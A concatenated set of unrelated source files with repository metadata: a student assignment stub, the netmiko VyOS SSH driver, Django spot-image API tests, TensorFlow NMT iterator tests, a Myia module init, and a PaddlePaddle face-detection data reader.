] | null | null | null | bikes/bikes.py | sethmenghi/cosc288-machine-learning | 4f17a3fe7229ded4c0fc42e9ee3595e6a07f26eb | [
"0BSD"
] | null | null | null | bikes/bikes.py | sethmenghi/cosc288-machine-learning | 4f17a3fe7229ded4c0fc42e9ee3595e6a07f26eb | [
"0BSD"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Name: Seth menghi
# E-mail Address: [email protected]
# Platform: MacOS
# Language/Environment: python
#
# In accordance with the class policies and Georgetown's Honor Code,
# I certify that, with the exceptions of the class resources and those
# items noted below, I have neither given nor received any assistance
# on this project.
#
from .traintestsets import TrainTestSets
t = TrainTestSets('-t ..data/bikes.mff')
print(t)
| 25.555556 | 70 | 0.741304 |
4a1e5cee3eceb4983d254273b0dd51c5133a7099 | 4,046 | py | Python | netmiko/vyos/vyos_ssh.py | AAm-kun/netmiko | 1c5d2e4c345778ee46e5e487f62c66d02f297625 | [
"MIT"
] | null | null | null | netmiko/vyos/vyos_ssh.py | AAm-kun/netmiko | 1c5d2e4c345778ee46e5e487f62c66d02f297625 | [
"MIT"
] | null | null | null | netmiko/vyos/vyos_ssh.py | AAm-kun/netmiko | 1c5d2e4c345778ee46e5e487f62c66d02f297625 | [
"MIT"
] | null | null | null | from typing import Optional
import time
import warnings
from netmiko.no_enable import NoEnable
from netmiko.base_connection import DELAY_FACTOR_DEPR_SIMPLE_MSG
from netmiko.cisco_base_connection import CiscoSSHConnection
class VyOSSSH(NoEnable, CiscoSSHConnection):
"""Implement methods for interacting with VyOS network devices."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self._test_channel_read()
self.set_base_prompt()
self.set_terminal_width(command="set terminal width 512", pattern="terminal")
self.disable_paging(command="set terminal length 0")
# Clear the read buffer
time.sleep(0.3 * self.global_delay_factor)
self.clear_buffer()
def check_config_mode(self, check_string="#"):
"""Checks if the device is in configuration mode"""
return super().check_config_mode(check_string=check_string)
def config_mode(
self,
config_command: str = "configure",
pattern: str = r"\[edit\]",
re_flags: int = 0,
) -> str:
return super().config_mode(
config_command=config_command, pattern=pattern, re_flags=re_flags
)
def exit_config_mode(self, exit_config="exit", pattern=r"exit"):
"""Exit configuration mode"""
output = ""
if self.check_config_mode():
output = self.send_command_timing(
exit_config, strip_prompt=False, strip_command=False
)
if "Cannot exit: configuration modified" in output:
output += self.send_command_timing(
"exit discard", strip_prompt=False, strip_command=False
)
if self.check_config_mode():
raise ValueError("Failed to exit configuration mode")
return output
def commit(
self,
comment: str = "",
read_timeout: float = 120,
delay_factor: Optional[float] = None,
) -> str:
"""
Commit the candidate configuration.
Commit the entered configuration. Raise an error and return the failure
if the commit fails.
default:
command_string = commit
comment:
command_string = commit comment <comment>
delay_factor: Deprecated in Netmiko 4.x. Will be eliminated in Netmiko 5.
"""
if delay_factor is not None:
warnings.warn(DELAY_FACTOR_DEPR_SIMPLE_MSG, DeprecationWarning)
error_marker = ["Failed to generate committed config", "Commit failed"]
command_string = "commit"
if comment:
command_string += f' comment "{comment}"'
output = self.config_mode()
output += self.send_command_expect(
command_string,
strip_prompt=False,
strip_command=False,
read_timeout=read_timeout,
)
if any(x in output for x in error_marker):
raise ValueError(f"Commit failed with following errors:\n\n{output}")
return output
def set_base_prompt(
self, pri_prompt_terminator="$", alt_prompt_terminator="#", delay_factor=1
):
"""Sets self.base_prompt: used as delimiter for stripping of trailing prompt in output."""
prompt = super().set_base_prompt(
pri_prompt_terminator=pri_prompt_terminator,
alt_prompt_terminator=alt_prompt_terminator,
delay_factor=delay_factor,
)
# Set prompt to user@hostname (remove two additional characters)
self.base_prompt = prompt[:-2].strip()
return self.base_prompt
def send_config_set(self, config_commands=None, exit_config_mode=False, **kwargs):
"""Remain in configuration mode."""
return super().send_config_set(
config_commands=config_commands, exit_config_mode=exit_config_mode, **kwargs
)
def save_config(self, *args, **kwargs):
"""Not Implemented"""
raise NotImplementedError
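# Illustrative usage sketch (not part of the original module). Host and
# credentials below are placeholders; the flow shown is: send_config_set()
# leaves the session in configuration mode, commit() applies the candidate
# configuration, exit_config_mode() then leaves it.
if __name__ == "__main__":
    from netmiko import ConnectHandler

    conn = ConnectHandler(
        device_type="vyos_ssh",
        host="192.0.2.10",
        username="vyos",
        password="vyos",
    )
    conn.send_config_set(["set system host-name lab-vyos"])
    print(conn.commit(comment="netmiko example"))
    conn.exit_config_mode()
    conn.disconnect()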
| 35.182609 | 98 | 0.640386 |
4a1e5edddb7b8d4c19426221dbf55bbdcaa6d341 | 8,995 | py | Python | test/images/spot_info.py | sbutler/spotseeker_server | 02bd2d646eab9f26ddbe8536b30e391359796c9c | [
"Apache-2.0"
] | null | null | null | test/images/spot_info.py | sbutler/spotseeker_server | 02bd2d646eab9f26ddbe8536b30e391359796c9c | [
"Apache-2.0"
] | null | null | null | test/images/spot_info.py | sbutler/spotseeker_server | 02bd2d646eab9f26ddbe8536b30e391359796c9c | [
"Apache-2.0"
] | null | null | null | """ Copyright 2012, 2013 UW Information Technology, University of Washington
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.conf import settings
from django.core import cache
from django.core.files import File
from django.test import TestCase
from django.test.client import Client
from django.test.utils import override_settings
from mock import patch
from os.path import abspath, dirname
from PIL import Image
from spotseeker_server import models
from spotseeker_server.models import Spot, SpotImage
import datetime
import simplejson as json
TEST_ROOT = abspath(dirname(__file__))
@override_settings(SPOTSEEKER_AUTH_MODULE='spotseeker_server.auth.all_ok',
SPOTSEEKER_SPOT_FORM='spotseeker_server.default_forms.spot.DefaultSpotForm')
class SpotResourceImageTest(TestCase):
def setUp(self):
spot = Spot.objects.create(name="This is to test images in the spot resource")
self.spot = spot
f = open("%s/../resources/test_gif.gif" % TEST_ROOT)
gif = SpotImage.objects.create(description="This is the GIF test", display_index=1, spot=spot, image=File(f))
f.close()
self.gif = gif
f = open("%s/../resources/test_jpeg.jpg" % TEST_ROOT)
jpeg = SpotImage.objects.create(description="This is the JPEG test", display_index=0,spot=spot, image=File(f))
f.close()
self.jpeg = jpeg
f = open("%s/../resources/test_png.png" % TEST_ROOT)
png = SpotImage.objects.create(description="This is the PNG test", spot=spot, image=File(f))
f.close()
self.png = png
def test_empty_image_data(self):
dummy_cache = cache.get_cache('django.core.cache.backends.dummy.DummyCache')
with patch.object(models, 'cache', dummy_cache):
spot = Spot.objects.create(name="A spot with no images")
c = Client()
response = c.get('/api/v1/spot/{0}'.format(spot.pk))
spot_dict = json.loads(response.content)
self.assertEquals(len(spot_dict["images"]), 0, "Has an empty array for a spot w/ no images")
def test_image_order(self):
dummy_cache = cache.get_cache('django.core.cache.backends.dummy.DummyCache')
with patch.object(models, 'cache', dummy_cache):
c = Client()
response = c.get('/api/v1/spot/{0}'.format(self.spot.pk))
spot_dict = json.loads(response.content)
images_fr_json = spot_dict['images']
images_fr_db = SpotImage.objects.filter(spot=self.spot).order_by('display_index')
# I'm not entirely happy with this batch of assertions, but right now don't have any better ideas
self.assertEquals(images_fr_json[0]['description'], 'This is the PNG test', "Image with display index None is returned first")
self.assertEquals(images_fr_json[1]['description'], 'This is the JPEG test', "Image with display index 0 is returned second")
self.assertEquals(images_fr_json[2]['description'], 'This is the GIF test', "Image with display index 1 is returned third")
def test_image_data(self):
dummy_cache = cache.get_cache('django.core.cache.backends.dummy.DummyCache')
with patch.object(models, 'cache', dummy_cache):
c = Client()
response = c.get('/api/v1/spot/{0}'.format(self.spot.pk))
spot_dict = json.loads(response.content)
self.assertEquals(len(spot_dict["images"]), 3, "Has 3 images")
has_gif = False
has_png = False
has_jpg = False
for image in spot_dict["images"]:
one_sec = datetime.timedelta(seconds=1)
if image["id"] == self.gif.pk:
has_gif = True
self.assertEquals(image["url"], "/api/v1/spot/{0}/image/{1}".format(self.spot.pk, self.gif.pk))
self.assertEquals(image["thumbnail_root"], "/api/v1/spot/{0}/image/{1}/thumb".format(self.spot.pk, self.gif.pk))
self.assertEquals(image["content-type"], "image/gif")
img = Image.open("%s/../resources/test_gif.gif" % TEST_ROOT)
self.assertEquals(image["width"], img.size[0], "Includes the gif width")
self.assertEquals(image["height"], img.size[1], "Includes the gif height")
# I have no idea if this will fail under TZs other than UTC, but here we go
# Creation and modification dates will NOT be the same, but should hopefully be w/in one second
create = datetime.datetime.strptime(image["creation_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
mod = datetime.datetime.strptime(image["modification_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
delta = mod - create
self.assertTrue(delta < one_sec, "creation_date and modification_date are less than one second apart")
self.assertEquals(image["upload_user"], "", "Lists an empty upload user")
self.assertEquals(image["upload_application"], "", "Lists an empty upload application")
self.assertEquals(image["display_index"], 1, "Image has display index 1")
if image["id"] == self.png.pk:
has_png = True
self.assertEquals(image["url"], "/api/v1/spot/{0}/image/{1}".format(self.spot.pk, self.png.pk))
self.assertEquals(image["thumbnail_root"], "/api/v1/spot/{0}/image/{1}/thumb".format(self.spot.pk, self.png.pk))
self.assertEquals(image["content-type"], "image/png")
img = Image.open("%s/../resources/test_png.png" % TEST_ROOT)
self.assertEquals(image["width"], img.size[0], "Includes the png width")
self.assertEquals(image["height"], img.size[1], "Includes the png height")
# I have no idea if this will fail under TZs other than UTC, but here we go
# Creation and modification dates will NOT be the same, but should hopefully be w/in one second
create = datetime.datetime.strptime(image["creation_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
mod = datetime.datetime.strptime(image["modification_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
delta = mod - create
self.assertTrue(delta < one_sec, "creation_date and modification_date are less than one second apart")
self.assertEquals(image["upload_user"], "", "Lists an empty upload user")
self.assertEquals(image["upload_application"], "", "Lists an empty upload application")
if image["id"] == self.jpeg.pk:
has_jpg = True
self.assertEquals(image["url"], "/api/v1/spot/{0}/image/{1}".format(self.spot.pk, self.jpeg.pk))
self.assertEquals(image["thumbnail_root"], "/api/v1/spot/{0}/image/{1}/thumb".format(self.spot.pk, self.jpeg.pk))
self.assertEquals(image["content-type"], "image/jpeg")
img = Image.open("%s/../resources/test_jpeg.jpg" % TEST_ROOT)
self.assertEquals(image["width"], img.size[0], "Includes the jpeg width")
self.assertEquals(image["height"], img.size[1], "Includes the jpeg height")
# I have no idea if this will fail under TZs other than UTC, but here we go
# Creation and modification dates will NOT be the same, but should hopefully be w/in one second
create = datetime.datetime.strptime(image["creation_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
mod = datetime.datetime.strptime(image["modification_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
delta = mod - create
self.assertTrue(delta < one_sec, "creation_date and modification_date are less than one second apart")
self.assertEquals(image["upload_user"], "", "Lists an empty upload user")
self.assertEquals(image["upload_application"], "", "Lists an empty upload application")
self.assertEquals(image["display_index"], 0, "Image has display index 0")
self.assertEquals(has_gif, True, "Found the gif")
self.assertEquals(has_jpg, True, "Found the jpg")
self.assertEquals(has_png, True, "Found the png")
| 55.184049 | 138 | 0.620678 |
4a1e5fa2efe368abaf7fb13c3717a6508d3b391b | 8,441 | py | Python | v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/staging/models/rough/nmt/utils/iterator_utils_test.py | myelintek/results | 11c38436a158c453e3011f8684570f7a55c03330 | [
"Apache-2.0"
] | 44 | 2018-11-07T18:52:33.000Z | 2019-07-06T12:48:18.000Z | v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/staging/models/rough/nmt/utils/iterator_utils_test.py | myelintek/results | 11c38436a158c453e3011f8684570f7a55c03330 | [
"Apache-2.0"
] | 12 | 2018-12-13T18:04:36.000Z | 2019-06-14T20:49:33.000Z | v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/staging/models/rough/nmt/utils/iterator_utils_test.py | myelintek/results | 11c38436a158c453e3011f8684570f7a55c03330 | [
"Apache-2.0"
] | 44 | 2018-11-09T21:04:52.000Z | 2019-06-24T07:40:28.000Z | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for iterator_utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.ops import lookup_ops
from utils import iterator_utils
class IteratorUtilsTest(tf.test.TestCase):
def testGetIterator(self):
tf.set_random_seed(1)
tgt_vocab_table = src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["f e a g", "c c a", "d", "c a"]))
tgt_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c c", "a b", "", "b c"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
num_buckets=5,
eos="eos",
sos="sos")
batch_size = 2
src_max_len = 3
dataset = iterator_utils.get_iterator(
src_dataset=src_dataset,
tgt_dataset=tgt_dataset,
src_vocab_table=src_vocab_table,
tgt_vocab_table=tgt_vocab_table,
batch_size=batch_size,
sos=hparams.sos,
eos=hparams.eos,
random_seed=hparams.random_seed,
num_buckets=hparams.num_buckets,
src_max_len=src_max_len,
reshuffle_each_iteration=False)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer)
features = sess.run(get_next)
self.assertAllEqual(
[[2, 0, 3], # c a eos -- eos is padding
[2, 2, 0]], # c c a
features["source"])
self.assertAllEqual([2, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 1, 2], # sos b c
[4, 0, 1]], # sos a b
features["target_input"])
self.assertAllEqual(
[[1, 2, 3], # b c eos
[0, 1, 3]], # a b eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
def testGetIteratorWithShard(self):
tf.set_random_seed(1)
tgt_vocab_table = src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c c a", "f e a g", "d", "c a"]))
tgt_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["a b", "c c", "", "b c"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
num_buckets=5,
eos="eos",
sos="sos")
batch_size = 2
src_max_len = 3
dataset = iterator_utils.get_iterator(
src_dataset=src_dataset,
tgt_dataset=tgt_dataset,
src_vocab_table=src_vocab_table,
tgt_vocab_table=tgt_vocab_table,
batch_size=batch_size,
sos=hparams.sos,
eos=hparams.eos,
random_seed=hparams.random_seed,
num_buckets=hparams.num_buckets,
src_max_len=src_max_len,
num_shards=2,
shard_index=1,
reshuffle_each_iteration=False)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer)
features = sess.run(get_next)
self.assertAllEqual(
[[2, 0, 3], # c a eos -- eos is padding
[-1, -1, 0]], # "f" == unknown, "e" == unknown, a
features["source"])
self.assertAllEqual([2, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 1, 2], # sos b c
[4, 2, 2]], # sos c c
features["target_input"])
self.assertAllEqual(
[[1, 2, 3], # b c eos
[2, 2, 3]], # c c eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
def testGetIteratorWithSkipCount(self):
tf.set_random_seed(1)
tgt_vocab_table = src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c a", "c c a", "d", "f e a g"]))
tgt_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["b c", "a b", "", "c c"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
num_buckets=5,
eos="eos",
sos="sos")
batch_size = 2
src_max_len = 3
skip_count = tf.placeholder(shape=(), dtype=tf.int64)
dataset = iterator_utils.get_iterator(
src_dataset=src_dataset,
tgt_dataset=tgt_dataset,
src_vocab_table=src_vocab_table,
tgt_vocab_table=tgt_vocab_table,
batch_size=batch_size,
sos=hparams.sos,
eos=hparams.eos,
random_seed=hparams.random_seed,
num_buckets=hparams.num_buckets,
src_max_len=src_max_len,
skip_count=skip_count,
reshuffle_each_iteration=False)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer, feed_dict={skip_count: 1})
features = sess.run(get_next)
self.assertAllEqual(
[[-1, -1, 0], # "f" == unknown, "e" == unknown, a
[2, 2, 0]], # c c a
features["source"])
self.assertAllEqual([3, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 2, 2], # sos c c
[4, 0, 1]], # sos a b
features["target_input"])
self.assertAllEqual(
[[2, 2, 3], # c c eos
[0, 1, 3]], # a b eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
# Re-init iterator with skip_count=0.
sess.run(iterator.initializer, feed_dict={skip_count: 0})
features = sess.run(get_next)
self.assertAllEqual(
[[-1, -1, 0], # "f" == unknown, "e" == unknown, a
[2, 2, 0]], # c c a
features["source"])
self.assertAllEqual([3, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 2, 2], # sos c c
[4, 0, 1]], # sos a b
features["target_input"])
self.assertAllEqual(
[[2, 2, 3], # c c eos
[0, 1, 3]], # a b eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
def testGetInferIterator(self):
src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c c a", "c a", "d", "f e a g"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
eos="eos",
sos="sos")
batch_size = 2
dataset = iterator_utils.get_infer_iterator(
src_dataset=src_dataset,
src_vocab_table=src_vocab_table,
batch_size=batch_size,
eos=hparams.eos)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer)
features = sess.run(get_next)
self.assertAllEqual(
[
[2, 2, 0], # c c a
[2, 0, 3]
], # c a eos
features["source"])
self.assertAllEqual([3, 2], features["source_sequence_length"])
if __name__ == "__main__":
tf.test.main()
| 35.766949 | 80 | 0.610473 |
4a1e5fd75e599e33491447311f40163454632598 | 258 | py | Python | myia/lib.py | strint/myia | 3d00d3fb3df80ab7a264a724226c5f56c6ff1a8a | [
"MIT"
] | 222 | 2019-02-13T07:56:28.000Z | 2022-03-28T07:07:54.000Z | myia/lib.py | strint/myia | 3d00d3fb3df80ab7a264a724226c5f56c6ff1a8a | [
"MIT"
] | 107 | 2019-02-12T21:56:39.000Z | 2022-03-12T01:08:03.000Z | myia/lib.py | strint/myia | 3d00d3fb3df80ab7a264a724226c5f56c6ff1a8a | [
"MIT"
] | 27 | 2017-11-14T17:58:15.000Z | 2019-01-14T01:36:09.000Z | """Consolidate all Myia functions in a single module."""
from .abstract import *
from .classes import *
from .grad import *
from .hypermap import *
from .info import *
from .ir import *
from .operations import *
from .pipeline import *
from .utils import *
| 21.5 | 56 | 0.728682 |
4a1e5fe6d5ba1a68b80ac7ab82b269878a45be20 | 11,894 | py | Python | PaddleCV/face_detection/reader.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 5 | 2021-09-28T13:28:01.000Z | 2021-12-21T07:25:44.000Z | PaddleCV/face_detection/reader.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 1 | 2019-11-18T03:03:37.000Z | 2019-11-18T03:03:37.000Z | PaddleCV/face_detection/reader.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 4 | 2021-08-11T08:25:10.000Z | 2021-10-16T07:41:59.000Z | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from PIL import Image
from PIL import ImageDraw
import numpy as np
import xml.etree.ElementTree
import os
import time
import copy
import random
import cv2
import six
import math
from itertools import islice
import paddle
import image_util
class Settings(object):
def __init__(self,
dataset=None,
data_dir=None,
label_file=None,
resize_h=None,
resize_w=None,
mean_value=[104., 117., 123.],
apply_distort=True,
apply_expand=True,
ap_version='11point',
toy=0):
self.dataset = dataset
self.ap_version = ap_version
self.toy = toy
self.data_dir = data_dir
self.apply_distort = apply_distort
self.apply_expand = apply_expand
self.resize_height = resize_h
self.resize_width = resize_w
self.img_mean = np.array(mean_value)[:, np.newaxis, np.newaxis].astype(
'float32')
self.expand_prob = 0.5
self.expand_max_ratio = 4
self.hue_prob = 0.5
self.hue_delta = 18
self.contrast_prob = 0.5
self.contrast_delta = 0.5
self.saturation_prob = 0.5
self.saturation_delta = 0.5
self.brightness_prob = 0.5
# _brightness_delta is the normalized value by 256
self.brightness_delta = 0.125
self.scale = 0.007843 # 1 / 127.5
self.data_anchor_sampling_prob = 0.5
self.min_face_size = 8.0
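# Editor's sketch (not part of the original reader): a minimal, hypothetical
# Settings construction; the dataset label and directory below are placeholders.
def _example_settings():
    """Return a Settings object wired with placeholder paths and a 640x640 resize."""
    return Settings(
        dataset='WIDER_FACE',            # hypothetical dataset label
        data_dir='data/WIDER_train',     # hypothetical image directory
        resize_h=640,
        resize_w=640,
        mean_value=[104., 117., 123.],
        apply_distort=True,
        apply_expand=True,
    )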
def to_chw_bgr(image):
"""
    Transpose image from HWC to CHW and from RGB to BGR.
    Args:
        image (np.array): an image with HWC and RGB layout.
"""
# HWC to CHW
if len(image.shape) == 3:
image = np.swapaxes(image, 1, 2)
image = np.swapaxes(image, 1, 0)
    # RGB to BGR
image = image[[2, 1, 0], :, :]
return image
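# Editor's sketch (not part of the original reader): shows the expected shape
# change; np.transpose(img, (2, 0, 1))[::-1] would be an equivalent one-liner.
def _to_chw_bgr_example():
    """Convert an all-zero 300x300 RGB HWC image and check the CHW BGR shape."""
    chw_bgr = to_chw_bgr(np.zeros((300, 300, 3), dtype='float32'))
    assert chw_bgr.shape == (3, 300, 300)
    return chw_bgr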
def preprocess(img, bbox_labels, mode, settings, image_path):
img_width, img_height = img.size
sampled_labels = bbox_labels
if mode == 'train':
if settings.apply_distort:
img = image_util.distort_image(img, settings)
if settings.apply_expand:
img, bbox_labels, img_width, img_height = image_util.expand_image(
img, bbox_labels, img_width, img_height, settings)
# sampling
batch_sampler = []
# used for continuous evaluation
if 'ce_mode' in os.environ:
random.seed(0)
np.random.seed(0)
prob = np.random.uniform(0., 1.)
if prob > settings.data_anchor_sampling_prob:
scale_array = np.array([16, 32, 64, 128, 256, 512])
batch_sampler.append(
image_util.sampler(1, 10, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.2,
0.0, True))
sampled_bbox = image_util.generate_batch_random_samples(
batch_sampler, bbox_labels, img_width, img_height, scale_array,
settings.resize_width, settings.resize_height)
img = np.array(img)
if len(sampled_bbox) > 0:
idx = int(np.random.uniform(0, len(sampled_bbox)))
img, sampled_labels = image_util.crop_image_sampling(
img, bbox_labels, sampled_bbox[idx], img_width, img_height,
settings.resize_width, settings.resize_height,
settings.min_face_size)
img = img.astype('uint8')
img = Image.fromarray(img)
else:
            # hard-coded batch samplers
batch_sampler.append(
image_util.sampler(1, 50, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
sampled_bbox = image_util.generate_batch_samples(
batch_sampler, bbox_labels, img_width, img_height)
img = np.array(img)
if len(sampled_bbox) > 0:
idx = int(np.random.uniform(0, len(sampled_bbox)))
img, sampled_labels = image_util.crop_image(
img, bbox_labels, sampled_bbox[idx], img_width, img_height,
settings.resize_width, settings.resize_height,
settings.min_face_size)
img = Image.fromarray(img)
interp_mode = [
Image.BILINEAR, Image.HAMMING, Image.NEAREST, Image.BICUBIC,
Image.LANCZOS
]
interp_indx = np.random.randint(0, 5)
img = img.resize(
(settings.resize_width, settings.resize_height),
resample=interp_mode[interp_indx])
img = np.array(img)
if mode == 'train':
mirror = int(np.random.uniform(0, 2))
if mirror == 1:
img = img[:, ::-1, :]
for i in six.moves.xrange(len(sampled_labels)):
tmp = sampled_labels[i][1]
sampled_labels[i][1] = 1 - sampled_labels[i][3]
sampled_labels[i][3] = 1 - tmp
img = to_chw_bgr(img)
img = img.astype('float32')
img -= settings.img_mean
img = img * settings.scale
return img, sampled_labels
def load_file_list(input_txt):
with open(input_txt, 'r') as f_dir:
lines_input_txt = f_dir.readlines()
file_dict = {}
num_class = 0
for i in range(len(lines_input_txt)):
line_txt = lines_input_txt[i].strip('\n\t\r')
if '--' in line_txt:
if i != 0:
num_class += 1
file_dict[num_class] = []
file_dict[num_class].append(line_txt)
if '--' not in line_txt:
if len(line_txt) > 6:
split_str = line_txt.split(' ')
x1_min = float(split_str[0])
y1_min = float(split_str[1])
x2_max = float(split_str[2])
y2_max = float(split_str[3])
line_txt = str(x1_min) + ' ' + str(y1_min) + ' ' + str(
x2_max) + ' ' + str(y2_max)
file_dict[num_class].append(line_txt)
else:
file_dict[num_class].append(line_txt)
return list(file_dict.values())
def expand_bboxes(bboxes,
expand_left=2.,
expand_up=2.,
expand_right=2.,
expand_down=2.):
"""
    Expand bboxes, expanding each box 2x in width and height by default.
"""
expand_boxes = []
for bbox in bboxes:
xmin = bbox[0]
ymin = bbox[1]
xmax = bbox[2]
ymax = bbox[3]
w = xmax - xmin
h = ymax - ymin
ex_xmin = max(xmin - w / expand_left, 0.)
ex_ymin = max(ymin - h / expand_up, 0.)
ex_xmax = min(xmax + w / expand_right, 1.)
ex_ymax = min(ymax + h / expand_down, 1.)
expand_boxes.append([ex_xmin, ex_ymin, ex_xmax, ex_ymax])
return expand_boxes
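# Editor's sketch (not part of the original reader): a centered 0.5 x 0.5
# normalized box doubles in width and height and is clipped to [0, 1].
def _expand_bboxes_example():
    """expand_bboxes([[0.25, 0.25, 0.75, 0.75]]) -> [[0.0, 0.0, 1.0, 1.0]]."""
    return expand_bboxes([[0.25, 0.25, 0.75, 0.75]])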
def train_generator(settings, file_list, batch_size, shuffle=True):
def reader():
if shuffle and 'ce_mode' not in os.environ:
np.random.shuffle(file_list)
batch_out = []
for item in file_list:
image_name = item[0]
image_path = os.path.join(settings.data_dir, image_name)
im = Image.open(image_path)
if im.mode == 'L':
im = im.convert('RGB')
im_width, im_height = im.size
# layout: label | xmin | ymin | xmax | ymax
bbox_labels = []
for index_box in range(len(item)):
if index_box >= 2:
bbox_sample = []
temp_info_box = item[index_box].split(' ')
xmin = float(temp_info_box[0])
ymin = float(temp_info_box[1])
w = float(temp_info_box[2])
h = float(temp_info_box[3])
# Filter out wrong labels
if w < 0 or h < 0:
continue
xmax = xmin + w
ymax = ymin + h
bbox_sample.append(1)
bbox_sample.append(float(xmin) / im_width)
bbox_sample.append(float(ymin) / im_height)
bbox_sample.append(float(xmax) / im_width)
bbox_sample.append(float(ymax) / im_height)
bbox_labels.append(bbox_sample)
im, sample_labels = preprocess(im, bbox_labels, "train", settings,
image_path)
sample_labels = np.array(sample_labels)
if len(sample_labels) == 0: continue
im = im.astype('float32')
face_box = sample_labels[:, 1:5]
head_box = expand_bboxes(face_box)
label = [1] * len(face_box)
batch_out.append((im, face_box, head_box, label))
if len(batch_out) == batch_size:
yield batch_out
batch_out = []
return reader
def train(settings,
file_list,
batch_size,
shuffle=True,
use_multiprocess=True,
num_workers=8):
file_lists = load_file_list(file_list)
if use_multiprocess:
        # Use true division with ceil so the list splits into at most num_workers
        # chunks (floor division can yield a zero-sized step for short file lists).
        n = int(math.ceil(len(file_lists) / num_workers))
split_lists = [
file_lists[i:i + n] for i in range(0, len(file_lists), n)
]
readers = []
for iterm in split_lists:
readers.append(
train_generator(settings, iterm, batch_size, shuffle))
return paddle.reader.multiprocess_reader(readers, False)
else:
return train_generator(settings, file_lists, batch_size, shuffle)
def test(settings, file_list):
file_lists = load_file_list(file_list)
def reader():
for image in file_lists:
image_name = image[0]
image_path = os.path.join(settings.data_dir, image_name)
im = Image.open(image_path)
if im.mode == 'L':
im = im.convert('RGB')
yield im, image_path
return reader
